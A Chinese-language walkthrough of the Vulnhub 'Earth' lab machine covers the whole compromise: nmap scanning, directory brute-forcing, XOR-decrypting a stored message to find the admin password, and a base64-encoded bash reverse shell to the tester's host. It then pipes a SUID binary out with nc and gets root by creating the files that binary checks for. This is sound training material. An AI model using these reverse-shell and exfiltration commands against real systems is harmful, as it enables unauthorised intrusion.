首页 > 其他分享 >Vulnhub-Earth靶机笔记

Vulnhub-Earth靶机笔记

时间:2024-11-29 14:14:34浏览次数:5  
标签:00 http tcp Vulnhub earth Earth 靶机 txt root

Earth 靶机笔记

概述

这是一台 Vulnhub 的靶机,主要是

Earth 靶机地址:https://vulnhub.com/entry/the-planets-earth,755/#download

一、nmap 扫描

1、端口扫描

-sT 以 TCP 全连接扫描,--min-rate 10000 以最低 10000 速率进行扫描,-p-进行全端口扫描,-o ports 结果输出到 ports 文件中

sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.52.4
Nmap scan report for 192.168.52.4
Host is up (0.00042s latency).
Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 00:0C:29:5D:22:84 (VMware)

# Nmap done at Fri Nov 22 15:32:16 2024 -- 1 IP address (1 host up) scanned in 13.43 seconds

2、详细信息扫描

以-sT 以 tcp, -sV 探测版本, -sC 以默认脚本 扫描端口 $ports,-O 探测操作系统版本,输出到 details 文件中

sudo nmap -sT -sV -sC -p22,80,443 -O -o nmapscan/details 192.168.52.4

结果:

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_  256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:5D:22:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 15:33:47 2024 -- 1 IP address (1 host up) scanned in 20.41 seconds

看到目标的两个域名信息 earth.localterratest.earth.local 我们将他写到 /etc/hosts 文件中

3、默认脚本扫描

nmap --script=vuln -p22,80,443 -o nmapscan/vuln 192.168.52.4
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
443/tcp open  https
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:5D:22:84 (VMware)

# Nmap done at Fri Nov 22 15:34:49 2024 -- 1 IP address (1 host up) scanned in 42.87 seconds

二、web 渗透

看到目标开放了 80 和 443 端口,我们打开看看

80 端口

image-20241129121626743

443 端口

image-20241129121732311

是一个 webserver 的默认页面

我们还有两个域名同时也看一下,发现两个域名所透露出来的信息是一样的

image-20241129121855867

看样子是一个消息反馈的页面,而下面有 Previous Messages 也就是 曾经的消息 看样子是加密了,而解密出来很可能是我们感兴趣的内容。

走到这里我们可以进行目录爆破了,从而充分扩大我们的攻击面

sudo gobuster dir -u http://192.168.52.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
sudo gobuster dir -u https://192.168.52.4:443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://terratest.earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

同时还可以加参数 -x zip,tar,txt 等后缀,扩大字典再次进行第二次扫描

通过目录爆破我们发现了 https://earth.local 下面有一个 /admin 的页面

image-20241129130000322

image-20241129130016844

是一个登陆页面

我们所知道的信息也就这些,当然我们在后边尝试几个可能的路径,像是:/robots.txt 这类的目录

image-20241129123152287

terratest.earth.local 域名下发现了一个 /testingnotes.*,尝试 fuzz 一下,发现是 /testingnotes.txt

发现了一段话

image-20241129123805084

关键的信息有:

采用 XOR,也就是异或加密

testdata.txt 内容是加密的密钥

terra 是用户名

查看 testdata.txt 内容

image-20241129125533558

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

我们来到 CyberChef 解密内容

image-20241129130229289

解密成功 earthclimatechangebad4humans 的重复字符串

这个应该就是密码,尝试在 admin 页面登陆

image-20241129130603687

image-20241129130615153

登录成功看到是一个命令执行的框

三、获得立足点

构造反弹 shell payload

image-20241129131045382

echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjMvNDQ0NCAwPiYxJwo= | base64 -d | bash

在网页执行这个

kali 端开启监听

sudo rlwrap -cAr nc -lvnp 4444

image-20241129131427704

成功获得了初始的 shell

/var/earth_web 翻找到了 user 的 flag

image-20241129131839617

四、提权到 root

find / -perm -4000 -type f 2> /dev/null
image-20241129132033974

有一个 reset_root 文件,令我们很感兴趣,执行看看

image-20241129132935824

看来执行失败了

利用 nc 传输到 kali 本地进行分析

kali 执行

nc -lvp 4444 > reset_root

image-20241129132555460

靶机执行

cat /usr/bin/reset_root | nc 192.168.52.3 4444

看到传输完成

image-20241129132654189

chmod +x reset_root

利用 file 查看文件属性

file reset_root

image-20241129132834850

看到就是 linux 的可执行文件

利用 ltrace 看看它的函数调用

ltrace ./reset_root

image-20241129133049803

看到有几个文件是不存在的

程序尝试访问 /dev/shm/kHgTFI5G/dev/shm/Zw7bV9U5/tmp/kcM0Wewe 这些文件,但访问失败(返回值为-1)

在靶机上创建这些文件

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

再次执行

reset_root

image-20241129133427606

看到 root 密码已经被我们重置为了 Earth

image-20241129134404140

成功获得了 root 权限

image-20241129134539245

找到了 root_flag

来一张照吧

[root@earth ~]# whoami
whoami
root
[root@earth ~]# uname -a
uname -a
Linux earth 5.14.9-200.fc34.x86_64 #1 SMP Thu Sep 30 11:55:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
[root@earth ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:5d:22:84 brd ff:ff:ff:ff:ff:ff
    altname enp2s1
    inet 192.168.52.4/24 brd 192.168.52.255 scope global dynamic noprefixroute ens33
       valid_lft 1730sec preferred_lft 1730sec
    inet6 fe80::f2c5:57e:d7af:5f01/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
[root@earth ~]# cat /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth ~]# cat root_flag.txt
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

这台靶机就被我们拿下了

最后

happy hacking ~~~

标签:00,http,tcp,Vulnhub,earth,Earth,靶机,txt,root
From: https://www.cnblogs.com/LINGX5/p/18576570

相关文章

  • Vulnhub WestWild1.1
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.140开了22ssh,80http,两个smb服务详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,80,139,445192.168.231.140漏洞扫描nmap--script=vuln-p22,80,139,445......
  • Vulnhub Kioptrix4
    VulnhubKioptrix40x01:端口扫描主机发现nmap-sn192.168.231.0/24全端口扫描nmap--min-rate10000-p-192.168.231.139开放22ssh,80http,139netbios-ssn,445microsoft-ds,后两个是smb服务端口139(NetBIOS-SSN):用于通过NetBIOS协议在局域网内实现文件和打印机共享。虽然......
  • 7. vulnhub渗透测试综合靶场DC-7
    目录信息收集渗透测试本次渗透测试学习收获信息收集arp-scan扫描主机arp-scan192.168.200.0/24nmap扫描nmap-sS192.168.200.152查看网站信息whatwebhttp://192.168.200.152利用网站分析插件看到CMS:Drupal8渗透测试目录爆破发现后台dirsearch-uhttp......
  • #靶机#--红队靶机vulnstack-2
    环境搭建打开web虚拟机用其他用户凭证登陆,密码过期修改密码就登陆成功了管理员账号密码:administrator/2wsx#EDCde1ay/1qaz@WSX管理员身份打开C:\Oracle\Middleware\user_projects\domains\base_domain\bin\starWebLogicnmap扫描主机发现nmap-sn-ohosts192.16......
  • VulnHub-Sick0s1.1解法二shellshock漏洞
    免责声明本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全部法律责任。本博客明确表示不支持、不鼓励也不参与任何形式的......
  • Vulnhub Tr0ll
    0x01:端口扫描主机发现nmap-sn192.168.231.0/24IP地址为192.168.231.137全端口扫描nmap--min-rate10000-p-192.168.231.137开放了21ftp,22ssh,80httpUDP扫描nmap-sU--min-rate10000-p-192.168.231.137无UDP端口开放接下来进行详细端口扫描nmap-sT-sC-......
  • Sickos1.1 详细靶机思路 实操笔记
    Sickos1.1详细靶机思路实操笔记免责声明本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全部法律责任。本博客明确表......
  • Vulhub Bob: 1.0.1靶机详解
    项目地址https://download.vulnhub.com/bob/Bob_v1.0.1.ova实验过程开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254根据对比可知Bob:1.0.1的一个ip地址为192.168.47.173扫描Bob:1.0.1的操作系统,端口及对应服务nmap-A-p-192.168.......
  • Vulnhub--y0usef靶场漏洞多种方法详解复现
    目录0x00准备工作1.靶场导入2.virtualbox网络设置3.靶机和攻击机的IP地址0x01信息收集1.主机发现2.详细信息扫描3.目录扫描0x02 漏洞挖掘1.403绕过2.burp爆破3.方法一:文件上传4.本地提权5.方法二:nc反弹shell6.方法三:使用msfvenom工具0x00准备工作靶场下载:h......
  • vulnhub-XXE靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、xml外部实体注入四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.202.134)靶 机:ubuntu17.10(192.168.202.161)2、使用工具/软件Kali:arp-scan(主机探测)、nmap......